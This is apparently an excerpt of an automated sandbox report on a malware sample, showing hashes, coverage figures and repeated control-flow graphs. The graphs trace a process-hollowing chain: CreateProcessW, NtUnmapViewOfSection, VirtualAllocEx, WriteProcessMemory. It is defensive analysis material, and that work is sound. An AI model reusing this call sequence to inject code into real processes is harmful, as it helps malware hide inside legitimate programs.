                    • Opcode ID: 09918698e4845557b0bd3e0cf5f6a2c0036d65cbc4cb3a1c5bc7356cb77e2c70
                    • Instruction ID: 34cc73ecb4f3ab7085046afdbcf90def6ba550cc793d1cb971f106a4578d33c0
                    • Opcode Fuzzy Hash: 09918698e4845557b0bd3e0cf5f6a2c0036d65cbc4cb3a1c5bc7356cb77e2c70
                    • Instruction Fuzzy Hash: E501E571A183149BC310EF55D84265FFBE4ABC9B54F804A1EF8945B261C774D9018BCB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:5.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:287
                    Total number of Limit Nodes:12

                    Graph

                    execution_graph 24464 d915d2 39 API calls 24466 d90fc8 46 API calls 24081 d903ec RegOpenKeyExA RegOpenKeyExA RegOpenKeyExA 24412 d918e3 18 API calls 24415 d92498 ExitProcess 24481 d91991 10 API calls 24098 d90e95 24099 d90e9c 24098->24099 24114 d90efe 24099->24114 24101 d90eed 24128 d90fba 24101->24128 24103 d90fa7 24140 d91095 24103->24140 24105 d91089 24106 d91112 CreateFileW 24105->24106 24107 d9112c 24106->24107 24108 d91120 24106->24108 24150 d9115d 44 API calls 24107->24150 24115 d90f0e 24114->24115 24116 d90fba 46 API calls 24115->24116 24117 d90fa7 24116->24117 24118 d91095 45 API calls 24117->24118 24119 d91089 24118->24119 24120 d91112 CreateFileW 24119->24120 24121 d9112c 24120->24121 24122 d91120 24120->24122 24151 d9115d 44 API calls 24121->24151 24122->24101 24129 d90fca 24128->24129 24130 d91095 45 API calls 24129->24130 24131 d91089 24130->24131 24132 d91112 CreateFileW 24131->24132 24133 d9112c 24132->24133 24134 d91120 24132->24134 24152 d9115d 44 API calls 24133->24152 24134->24103 24141 d910a5 24140->24141 24142 d91112 CreateFileW 24141->24142 24143 d9112c 24142->24143 24144 d91120 24142->24144 24153 d9115d 44 API calls 24143->24153 24144->24105 24167 d91b8c 24168 d91b8e 24167->24168 24169 d91b98 CreateProcessW 24168->24169 24170 d91bc6 24169->24170 24171 d91c6f NtUnmapViewOfSection 24170->24171 24172 d91c90 24171->24172 24179 d91cb0 24172->24179 24174 d91ca1 24175 d91d2d VirtualAllocEx 24174->24175 24177 d91d3a 24175->24177 24176 d91dfd WriteProcessMemory 24178 d91e0e 24176->24178 24177->24176 24180 d91cc0 24179->24180 24181 d91d2d VirtualAllocEx 24180->24181 24183 d91d3a 24181->24183 24182 d91dfd WriteProcessMemory 24184 d91e0e 24182->24184 24183->24182 24184->24174 24420 d91082 45 API calls 24421 d91686 33 API calls 24199 d90dbe 24200 d90dc0 24199->24200 24201 d90dca Sleep 24200->24201 24202 d90ddd 24201->24202 24203 d90e8d 24202->24203 24204 d90efe 47 API calls 24202->24204 24205 d90eed 24204->24205 24206 d90fba 46 API calls 24205->24206 24207 d90fa7 24206->24207 24208 d91095 45 API calls 24207->24208 24209 d91089 24208->24209 24210 d91112 CreateFileW 24209->24210 24211 d9112c 24210->24211 24212 d91120 24210->24212 24218 d9115d 44 API calls 24211->24218 24424 d91cbe VirtualAllocEx WriteProcessMemory 24363 d913a8 40 API calls 24493 d919ad 14 API calls 24427 d90caf 51 API calls 24364 d904ae RegOpenKeyExA 24365 d912a2 24366 d912a4 24365->24366 24367 d912ae VirtualAlloc 24366->24367 24368 d912d7 24367->24368 24378 d912fd 24368->24378 24370 d912f4 24371 d9137a ReadFile 24370->24371 24372 d9138e 24371->24372 24373 d91417 FindCloseChangeNotification 24372->24373 24374 d91425 24373->24374 24375 d91459 24374->24375 24376 d915c4 39 API calls 24375->24376 24377 d915b7 24376->24377 24379 d9130d 24378->24379 24380 d9137a ReadFile 24379->24380 24381 d9138e 24380->24381 24382 d91417 FindCloseChangeNotification 24381->24382 24383 d91425 24382->24383 24384 d91459 24383->24384 24387 d915c4 39 API calls 24384->24387 24386 d915b7 24387->24386 24388 d90aa5 24389 d90aa7 24388->24389 24390 d90ab1 CoInitialize 24389->24390 24391 d90ac3 24390->24391 24392 d909a6 CoInitialize CoInitialize 24495 d90d5b 49 API calls 24059 d9055a 24061 d9051c 24059->24061 24064 d9055e 24059->24064 24060 d90554 24061->24060 24062 d9052e RegOpenKeyExA 24061->24062 24062->24061 24063 d905ea 24062->24063 24433 d9165f 38 API calls 24070 d90948 CoInitialize CoInitialize CoInitialize 24072 d90a42 CoInitialize 24502 d9177b 28 API calls 24505 d9116b 44 API calls 24082 d9136e 24083 d91370 24082->24083 24084 d9137a ReadFile 24083->24084 24085 d9138e 24084->24085 24086 d91417 FindCloseChangeNotification 24085->24086 24087 d91425 24086->24087 24088 d91459 24087->24088 24091 d915c4 39 API calls 24088->24091 24090 d915b7 24091->24090 24094 d90467 RegOpenKeyExA RegOpenKeyExA 24447 d91219 44 API calls 24155 d92509 24156 d9250b 24155->24156 24157 d92515 ExitProcess 24156->24157 24158 d9140b 24159 d9140d 24158->24159 24160 d91417 FindCloseChangeNotification 24159->24160 24161 d91425 24160->24161 24162 d91459 24161->24162 24165 d915c4 39 API calls 24162->24165 24164 d915b7 24165->24164 24516 d90f0c 47 API calls 24452 d91c00 NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory VirtualAllocEx WriteProcessMemory 24188 d91106 24189 d91108 24188->24189 24190 d91112 CreateFileW 24189->24190 24191 d9112c 24190->24191 24192 d91120 24190->24192 24198 d9115d 44 API calls 24191->24198 24219 d91635 24220 d91637 24219->24220 24221 d91641 VirtualAlloc 24220->24221 24222 d9164f 24221->24222 24252 d916a6 24222->24252 24224 d916a2 24225 d917f2 24280 d91828 24225->24280 24226 d91692 24226->24224 24226->24225 24227 d9174a 24226->24227 24361 d9176d 28 API calls 24227->24361 24230 d91826 24231 d9181c 24231->24230 24232 d918a5 VirtualFree 24231->24232 24301 d918d5 24232->24301 24234 d918c7 24319 d91983 24234->24319 24235 d91761 24235->24225 24237 d91975 24335 d91a22 24237->24335 24239 d91a12 24349 d91b1b 24239->24349 24241 d91b0c 24242 d91b98 CreateProcessW 24241->24242 24243 d91bc6 24242->24243 24244 d91c6f NtUnmapViewOfSection 24243->24244 24245 d91c90 24244->24245 24246 d91cb0 2 API calls 24245->24246 24247 d91ca1 24246->24247 24248 d91d2d VirtualAllocEx 24247->24248 24250 d91d3a 24248->24250 24249 d91dfd WriteProcessMemory 24251 d91e0e 24249->24251 24250->24249 24253 d916b6 24252->24253 24254 d917f2 24253->24254 24255 d9174a 24253->24255 24256 d91828 23 API calls 24254->24256 24362 d9176d 28 API calls 24255->24362 24259 d9181c 24256->24259 24258 d91826 24259->24258 24260 d918a5 VirtualFree 24259->24260 24261 d918d5 18 API calls 24260->24261 24262 d918c7 24261->24262 24264 d91983 14 API calls 24262->24264 24263 d91761 24263->24254 24265 d91975 24264->24265 24266 d91a22 10 API calls 24265->24266 24267 d91a12 24266->24267 24268 d91b1b 6 API calls 24267->24268 24269 d91b0c 24268->24269 24270 d91b98 CreateProcessW 24269->24270 24271 d91bc6 24270->24271 24272 d91c6f NtUnmapViewOfSection 24271->24272 24273 d91c90 24272->24273 24274 d91cb0 2 API calls 24273->24274 24275 d91ca1 24274->24275 24276 d91d2d VirtualAllocEx 24275->24276 24278 d91d3a 24276->24278 24277 d91dfd WriteProcessMemory 24279 d91e0e 24277->24279 24278->24277 24279->24226 24281 d91838 24280->24281 24282 d918a5 VirtualFree 24281->24282 24283 d918d5 18 API calls 24282->24283 24284 d918c7 24283->24284 24285 d91983 14 API calls 24284->24285 24286 d91975 24285->24286 24287 d91a22 10 API calls 24286->24287 24288 d91a12 24287->24288 24289 d91b1b 6 API calls 24288->24289 24290 d91b0c 24289->24290 24291 d91b98 CreateProcessW 24290->24291 24292 d91bc6 24291->24292 24293 d91c6f NtUnmapViewOfSection 24292->24293 24294 d91c90 24293->24294 24295 d91cb0 2 API calls 24294->24295 24296 d91ca1 24295->24296 24297 d91d2d VirtualAllocEx 24296->24297 24299 d91d3a 24297->24299 24298 d91dfd WriteProcessMemory 24300 d91e0e 24298->24300 24299->24298 24300->24231 24302 d918e5 24301->24302 24303 d91983 14 API calls 24302->24303 24304 d91975 24303->24304 24305 d91a22 10 API calls 24304->24305 24306 d91a12 24305->24306 24307 d91b1b 6 API calls 24306->24307 24308 d91b0c 24307->24308 24309 d91b98 CreateProcessW 24308->24309 24310 d91bc6 24309->24310 24311 d91c6f NtUnmapViewOfSection 24310->24311 24312 d91c90 24311->24312 24313 d91cb0 2 API calls 24312->24313 24314 d91ca1 24313->24314 24315 d91d2d VirtualAllocEx 24314->24315 24317 d91d3a 24315->24317 24316 d91dfd WriteProcessMemory 24318 d91e0e 24316->24318 24317->24316 24318->24234 24320 d91993 24319->24320 24321 d91a22 10 API calls 24320->24321 24322 d91a12 24321->24322 24323 d91b1b 6 API calls 24322->24323 24324 d91b0c 24323->24324 24325 d91b98 CreateProcessW 24324->24325 24326 d91bc6 24325->24326 24327 d91c6f NtUnmapViewOfSection 24326->24327 24328 d91c90 24327->24328 24329 d91cb0 2 API calls 24328->24329 24330 d91ca1 24329->24330 24331 d91d2d VirtualAllocEx 24330->24331 24333 d91d3a 24331->24333 24332 d91dfd WriteProcessMemory 24334 d91e0e 24332->24334 24333->24332 24334->24237 24336 d91a32 24335->24336 24337 d91b1b 6 API calls 24336->24337 24338 d91b0c 24337->24338 24339 d91b98 CreateProcessW 24338->24339 24340 d91bc6 24339->24340 24341 d91c6f NtUnmapViewOfSection 24340->24341 24342 d91c90 24341->24342 24343 d91cb0 2 API calls 24342->24343 24344 d91ca1 24343->24344 24345 d91d2d VirtualAllocEx 24344->24345 24347 d91d3a 24345->24347 24346 d91dfd WriteProcessMemory 24348 d91e0e 24346->24348 24347->24346 24348->24239 24350 d91b2b 24349->24350 24351 d91b98 CreateProcessW 24350->24351 24352 d91bc6 24351->24352 24353 d91c6f NtUnmapViewOfSection 24352->24353 24354 d91c90 24353->24354 24355 d91cb0 2 API calls 24354->24355 24356 d91ca1 24355->24356 24357 d91d2d VirtualAllocEx 24356->24357 24359 d91d3a 24357->24359 24358 d91dfd WriteProcessMemory 24360 d91e0e 24358->24360 24359->24358 24360->24241 24361->24235 24362->24263 24521 d91d37 WriteProcessMemory 24457 d91836 23 API calls 24522 d91b29 6 API calls 24458 d90e2b 48 API calls 24461 d91423 39 API calls 24527 d91327 41 API calls

                    Executed Functions

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 d916a6-d916bc 2 d916df-d916f7 call d905f3 0->2 3 d916be-d916d3 0->3 9 d916f9-d91734 call d905f3 call d90702 2->9 3->9 10 d916d5-d916dd call d9003a 3->10 25 d9173a-d91744 9->25 26 d917f2-d91824 call d91828 9->26 10->2 25->26 29 d9174a-d91783 call d9176d 25->29 35 d9188b-d918c8 call d90702 VirtualFree call d918d5 26->35 36 d91826 26->36 41 d91785-d917a4 call d9003a 29->41 42 d917a6-d917f0 call d905f3 * 2 call d90702 29->42 59 d918ca-d918cb 35->59 60 d91936-d9193b 35->60 41->42 42->26 61 d9193d-d91948 call d90702 59->61 63 d918ce-d918d2 59->63 60->61 66 d9194d-d91976 call d91983 61->66 63->66 67 d918d4-d918eb 63->67 95 d91978-d91979 66->95 96 d919e4-d919e9 66->96 71 d918ed-d9190c call d9003a 67->71 72 d9190e-d91934 call d905f3 * 2 67->72 71->72 72->60 97 d919eb-d919f6 call d90702 95->97 99 d9197c-d91980 95->99 96->97 100 d919fb-d91a13 call d91a22 97->100 99->100 101 d91982-d91999 99->101 123 d91a59 100->123 124 d91a16-d91a38 100->124 105 d9199b-d919ba call d9003a 101->105 106 d919bc-d919e2 call d905f3 * 2 101->106 105->106 106->96 125 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 123->125 124->125 130 d91a3a-d91a54 call d9003a 124->130 154 d91b0f-d91b10 125->154 155 d91b74 125->155 130->123 156 d91b12-d91b13 154->156 157 d91b77-d91b83 154->157 158 d91b75 155->158 159 d91b74 call d905f3 155->159 162 d91b15-d91b31 156->162 163 d91b84 156->163 164 d91b87-d91bde call d90702 CreateProcessW call d91bf2 157->164 160 d91b7a-d91b83 158->160 161 d91b75 call d905f3 158->161 159->158 160->164 161->160 169 d91b33-d91b52 call d9003a 162->169 170 d91b54-d91b75 call d905f3 * 2 162->170 163->164 186 d91be0-d91be3 164->186 187 d91c35-d91c39 call d905f3 164->187 169->170 170->160 190 d91c3b 186->190 191 d91be5-d91c08 186->191 193 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 187->193 190->193 195 d91c2b-d91c34 191->195 196 d91c0a-d91c29 call d9003a 191->196 215 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 193->215 216 d91cc8-d91ce7 call d9003a 193->216 195->187 196->195 238 d91dd9 215->238 239 d91d70-d91d78 215->239 216->215 241 d91dda 238->241 242 d91dd9 call d905f3 238->242 246 d91d7a-d91d7d 239->246 247 d91dc7-d91dda call d905f3 * 2 239->247 243 d91ddf-d91df3 call d90702 241->243 244 d91dda call d905f3 241->244 242->241 250 d91df8-d91e54 WriteProcessMemory call d91e3e 243->250 244->243 246->250 251 d91d7f-d91d96 246->251 247->243 275 d91e77-d91ec3 call d905f3 * 2 call d90702 250->275 276 d91e56-d91e75 call d9003a 250->276 257 d91db9-d91dc3 251->257 258 d91d98-d91db7 call d9003a 251->258 257->247 258->257 276->275
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 8bfb6e92e4e31dd5dd843396850cfa82e4cbde6d03bc6bfe8889a133e051f80c
                    • Instruction ID: b15af8fd1cfb61fc4de74625df18664adf058829690075a91bbe992520ab5509
                    • Opcode Fuzzy Hash: 8bfb6e92e4e31dd5dd843396850cfa82e4cbde6d03bc6bfe8889a133e051f80c
                    • Instruction Fuzzy Hash: F702903DB19617FEEF16A7718C12F3D6999FB81B05F249529F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 294 d91828-d9183e 296 d91861-d91879 call d905f3 294->296 297 d91840-d91855 294->297 303 d9187b-d918c8 call d905f3 call d90702 VirtualFree call d918d5 296->303 297->303 304 d91857-d91860 call d9003a 297->304 318 d918ca-d918cb 303->318 319 d91936-d9193b 303->319 304->296 320 d9193d-d91948 call d90702 318->320 321 d918ce-d918d2 318->321 319->320 323 d9194d-d91976 call d91983 320->323 321->323 324 d918d4-d918eb 321->324 347 d91978-d91979 323->347 348 d919e4-d919e9 323->348 327 d918ed-d9190c call d9003a 324->327 328 d9190e-d91934 call d905f3 * 2 324->328 327->328 328->319 349 d919eb-d919f6 call d90702 347->349 351 d9197c-d91980 347->351 348->349 352 d919fb-d91a13 call d91a22 349->352 351->352 353 d91982-d91999 351->353 375 d91a59 352->375 376 d91a16-d91a38 352->376 357 d9199b-d919ba call d9003a 353->357 358 d919bc-d919e2 call d905f3 * 2 353->358 357->358 358->348 377 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 375->377 376->377 382 d91a3a-d91a54 call d9003a 376->382 406 d91b0f-d91b10 377->406 407 d91b74 377->407 382->375 408 d91b12-d91b13 406->408 409 d91b77-d91b83 406->409 410 d91b75 407->410 411 d91b74 call d905f3 407->411 414 d91b15-d91b31 408->414 415 d91b84 408->415 416 d91b87-d91bde call d90702 CreateProcessW call d91bf2 409->416 412 d91b7a-d91b83 410->412 413 d91b75 call d905f3 410->413 411->410 412->416 413->412 421 d91b33-d91b52 call d9003a 414->421 422 d91b54-d91b75 call d905f3 * 2 414->422 415->416 438 d91be0-d91be3 416->438 439 d91c35-d91c39 call d905f3 416->439 421->422 422->412 442 d91c3b 438->442 443 d91be5-d91c08 438->443 445 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 439->445 442->445 447 d91c2b-d91c34 443->447 448 d91c0a-d91c29 call d9003a 443->448 467 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 445->467 468 d91cc8-d91ce7 call d9003a 445->468 447->439 448->447 490 d91dd9 467->490 491 d91d70-d91d78 467->491 468->467 493 d91dda 490->493 494 d91dd9 call d905f3 490->494 498 d91d7a-d91d7d 491->498 499 d91dc7-d91dda call d905f3 * 2 491->499 495 d91ddf-d91df3 call d90702 493->495 496 d91dda call d905f3 493->496 494->493 502 d91df8-d91e54 WriteProcessMemory call d91e3e 495->502 496->495 498->502 503 d91d7f-d91d96 498->503 499->495 527 d91e77-d91ec3 call d905f3 * 2 call d90702 502->527 528 d91e56-d91e75 call d9003a 502->528 509 d91db9-d91dc3 503->509 510 d91d98-d91db7 call d9003a 503->510 509->499 510->509 528->527
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 75a0a3093dcc1256c6f6a8c3742ac2abb117dd52b3ba4473718badf47a093bf3
                    • Instruction ID: 4adbc832822baa37ba9096dce791b1f4f0e597d4608bcdb3e9e2ab2ca8d1ae81
                    • Opcode Fuzzy Hash: 75a0a3093dcc1256c6f6a8c3742ac2abb117dd52b3ba4473718badf47a093bf3
                    • Instruction Fuzzy Hash: 12F19D3DB19617FDEF16A7618C22F3D6999FB81B05F249529F0839A142FE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 546 d91836-d9183e 547 d91861-d91879 call d905f3 546->547 548 d91840-d91855 546->548 554 d9187b-d918c8 call d905f3 call d90702 VirtualFree call d918d5 547->554 548->554 555 d91857-d91860 call d9003a 548->555 569 d918ca-d918cb 554->569 570 d91936-d9193b 554->570 555->547 571 d9193d-d91948 call d90702 569->571 572 d918ce-d918d2 569->572 570->571 574 d9194d-d91976 call d91983 571->574 572->574 575 d918d4-d918eb 572->575 598 d91978-d91979 574->598 599 d919e4-d919e9 574->599 578 d918ed-d9190c call d9003a 575->578 579 d9190e-d91934 call d905f3 * 2 575->579 578->579 579->570 600 d919eb-d919f6 call d90702 598->600 602 d9197c-d91980 598->602 599->600 603 d919fb-d91a13 call d91a22 600->603 602->603 604 d91982-d91999 602->604 626 d91a59 603->626 627 d91a16-d91a38 603->627 608 d9199b-d919ba call d9003a 604->608 609 d919bc-d919e2 call d905f3 * 2 604->609 608->609 609->599 628 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 626->628 627->628 633 d91a3a-d91a54 call d9003a 627->633 657 d91b0f-d91b10 628->657 658 d91b74 628->658 633->626 659 d91b12-d91b13 657->659 660 d91b77-d91b83 657->660 661 d91b75 658->661 662 d91b74 call d905f3 658->662 665 d91b15-d91b31 659->665 666 d91b84 659->666 667 d91b87-d91bde call d90702 CreateProcessW call d91bf2 660->667 663 d91b7a-d91b83 661->663 664 d91b75 call d905f3 661->664 662->661 663->667 664->663 672 d91b33-d91b52 call d9003a 665->672 673 d91b54-d91b75 call d905f3 * 2 665->673 666->667 689 d91be0-d91be3 667->689 690 d91c35-d91c39 call d905f3 667->690 672->673 673->663 693 d91c3b 689->693 694 d91be5-d91c08 689->694 696 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 690->696 693->696 698 d91c2b-d91c34 694->698 699 d91c0a-d91c29 call d9003a 694->699 718 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 696->718 719 d91cc8-d91ce7 call d9003a 696->719 698->690 699->698 741 d91dd9 718->741 742 d91d70-d91d78 718->742 719->718 744 d91dda 741->744 745 d91dd9 call d905f3 741->745 749 d91d7a-d91d7d 742->749 750 d91dc7-d91dda call d905f3 * 2 742->750 746 d91ddf-d91df3 call d90702 744->746 747 d91dda call d905f3 744->747 745->744 753 d91df8-d91e54 WriteProcessMemory call d91e3e 746->753 747->746 749->753 754 d91d7f-d91d96 749->754 750->746 778 d91e77-d91ec3 call d905f3 * 2 call d90702 753->778 779 d91e56-d91e75 call d9003a 753->779 760 d91db9-d91dc3 754->760 761 d91d98-d91db7 call d9003a 754->761 760->750 761->760 779->778
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 9502e744bd9e8b834948add4f3d20355d7be1e921f36745f69c6a4dc6e075dcb
                    • Instruction ID: 7c193c2b8651b1357d9986823ab49bbffff5f4c8a5b5688a18a108b58e9d5317
                    • Opcode Fuzzy Hash: 9502e744bd9e8b834948add4f3d20355d7be1e921f36745f69c6a4dc6e075dcb
                    • Instruction Fuzzy Hash: DDF19C3DA19617FDEF16A7618C12F3D6999FB81B05F249519F0839A182FE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 797 d91852-d91855 799 d9187b-d918c8 call d905f3 call d90702 VirtualFree call d918d5 797->799 800 d91857-d91879 call d9003a call d905f3 797->800 818 d918ca-d918cb 799->818 819 d91936-d9193b 799->819 800->799 820 d9193d-d91948 call d90702 818->820 821 d918ce-d918d2 818->821 819->820 823 d9194d-d91976 call d91983 820->823 821->823 824 d918d4-d918eb 821->824 847 d91978-d91979 823->847 848 d919e4-d919e9 823->848 827 d918ed-d9190c call d9003a 824->827 828 d9190e-d91934 call d905f3 * 2 824->828 827->828 828->819 849 d919eb-d919f6 call d90702 847->849 851 d9197c-d91980 847->851 848->849 852 d919fb-d91a13 call d91a22 849->852 851->852 853 d91982-d91999 851->853 875 d91a59 852->875 876 d91a16-d91a38 852->876 857 d9199b-d919ba call d9003a 853->857 858 d919bc-d919e2 call d905f3 * 2 853->858 857->858 858->848 877 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 875->877 876->877 882 d91a3a-d91a54 call d9003a 876->882 906 d91b0f-d91b10 877->906 907 d91b74 877->907 882->875 908 d91b12-d91b13 906->908 909 d91b77-d91b83 906->909 910 d91b75 907->910 911 d91b74 call d905f3 907->911 914 d91b15-d91b31 908->914 915 d91b84 908->915 916 d91b87-d91bde call d90702 CreateProcessW call d91bf2 909->916 912 d91b7a-d91b83 910->912 913 d91b75 call d905f3 910->913 911->910 912->916 913->912 921 d91b33-d91b52 call d9003a 914->921 922 d91b54-d91b75 call d905f3 * 2 914->922 915->916 938 d91be0-d91be3 916->938 939 d91c35-d91c39 call d905f3 916->939 921->922 922->912 942 d91c3b 938->942 943 d91be5-d91c08 938->943 945 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 939->945 942->945 947 d91c2b-d91c34 943->947 948 d91c0a-d91c29 call d9003a 943->948 967 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 945->967 968 d91cc8-d91ce7 call d9003a 945->968 947->939 948->947 990 d91dd9 967->990 991 d91d70-d91d78 967->991 968->967 993 d91dda 990->993 994 d91dd9 call d905f3 990->994 998 d91d7a-d91d7d 991->998 999 d91dc7-d91dda call d905f3 * 2 991->999 995 d91ddf-d91df3 call d90702 993->995 996 d91dda call d905f3 993->996 994->993 1002 d91df8-d91e54 WriteProcessMemory call d91e3e 995->1002 996->995 998->1002 1003 d91d7f-d91d96 998->1003 999->995 1027 d91e77-d91ec3 call d905f3 * 2 call d90702 1002->1027 1028 d91e56-d91e75 call d9003a 1002->1028 1009 d91db9-d91dc3 1003->1009 1010 d91d98-d91db7 call d9003a 1003->1010 1009->999 1010->1009 1028->1027
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: e08d23f83d4464460235eeb104c9c910700ea022e7404803ec5bafce6990c29a
                    • Instruction ID: 0ad2f77988de8f04cbbdd166e7e3d4c3872255c2022bb9bfe16423b7b3f68440
                    • Opcode Fuzzy Hash: e08d23f83d4464460235eeb104c9c910700ea022e7404803ec5bafce6990c29a
                    • Instruction Fuzzy Hash: D4F18D3DA19617FDEF16A7718C12F3D699AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1046 d9186d-d918c8 call d905f3 * 2 call d90702 VirtualFree call d918d5 1061 d918ca-d918cb 1046->1061 1062 d91936-d9193b 1046->1062 1063 d9193d-d91948 call d90702 1061->1063 1064 d918ce-d918d2 1061->1064 1062->1063 1066 d9194d-d91976 call d91983 1063->1066 1064->1066 1067 d918d4-d918eb 1064->1067 1090 d91978-d91979 1066->1090 1091 d919e4-d919e9 1066->1091 1070 d918ed-d9190c call d9003a 1067->1070 1071 d9190e-d91934 call d905f3 * 2 1067->1071 1070->1071 1071->1062 1092 d919eb-d919f6 call d90702 1090->1092 1094 d9197c-d91980 1090->1094 1091->1092 1095 d919fb-d91a13 call d91a22 1092->1095 1094->1095 1096 d91982-d91999 1094->1096 1118 d91a59 1095->1118 1119 d91a16-d91a38 1095->1119 1100 d9199b-d919ba call d9003a 1096->1100 1101 d919bc-d919e2 call d905f3 * 2 1096->1101 1100->1101 1101->1091 1120 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 1118->1120 1119->1120 1125 d91a3a-d91a54 call d9003a 1119->1125 1149 d91b0f-d91b10 1120->1149 1150 d91b74 1120->1150 1125->1118 1151 d91b12-d91b13 1149->1151 1152 d91b77-d91b83 1149->1152 1153 d91b75 1150->1153 1154 d91b74 call d905f3 1150->1154 1157 d91b15-d91b31 1151->1157 1158 d91b84 1151->1158 1159 d91b87-d91bde call d90702 CreateProcessW call d91bf2 1152->1159 1155 d91b7a-d91b83 1153->1155 1156 d91b75 call d905f3 1153->1156 1154->1153 1155->1159 1156->1155 1164 d91b33-d91b52 call d9003a 1157->1164 1165 d91b54-d91b75 call d905f3 * 2 1157->1165 1158->1159 1181 d91be0-d91be3 1159->1181 1182 d91c35-d91c39 call d905f3 1159->1182 1164->1165 1165->1155 1185 d91c3b 1181->1185 1186 d91be5-d91c08 1181->1186 1188 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 1182->1188 1185->1188 1190 d91c2b-d91c34 1186->1190 1191 d91c0a-d91c29 call d9003a 1186->1191 1210 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 1188->1210 1211 d91cc8-d91ce7 call d9003a 1188->1211 1190->1182 1191->1190 1233 d91dd9 1210->1233 1234 d91d70-d91d78 1210->1234 1211->1210 1236 d91dda 1233->1236 1237 d91dd9 call d905f3 1233->1237 1241 d91d7a-d91d7d 1234->1241 1242 d91dc7-d91dda call d905f3 * 2 1234->1242 1238 d91ddf-d91df3 call d90702 1236->1238 1239 d91dda call d905f3 1236->1239 1237->1236 1245 d91df8-d91e54 WriteProcessMemory call d91e3e 1238->1245 1239->1238 1241->1245 1246 d91d7f-d91d96 1241->1246 1242->1238 1270 d91e77-d91ec3 call d905f3 * 2 call d90702 1245->1270 1271 d91e56-d91e75 call d9003a 1245->1271 1252 d91db9-d91dc3 1246->1252 1253 d91d98-d91db7 call d9003a 1246->1253 1252->1242 1253->1252 1271->1270
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: a962fcf435c8cb7aa2d987b1e711c5460eb804a3c95d6236ae7c51eea72646d1
                    • Instruction ID: 9c8496152c69372821fee955f93d46b48514be13c72fdc0983a7136e642f4238
                    • Opcode Fuzzy Hash: a962fcf435c8cb7aa2d987b1e711c5460eb804a3c95d6236ae7c51eea72646d1
                    • Instruction Fuzzy Hash: F4E1AD3DB19617FDEF16A7618C12F3D699AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
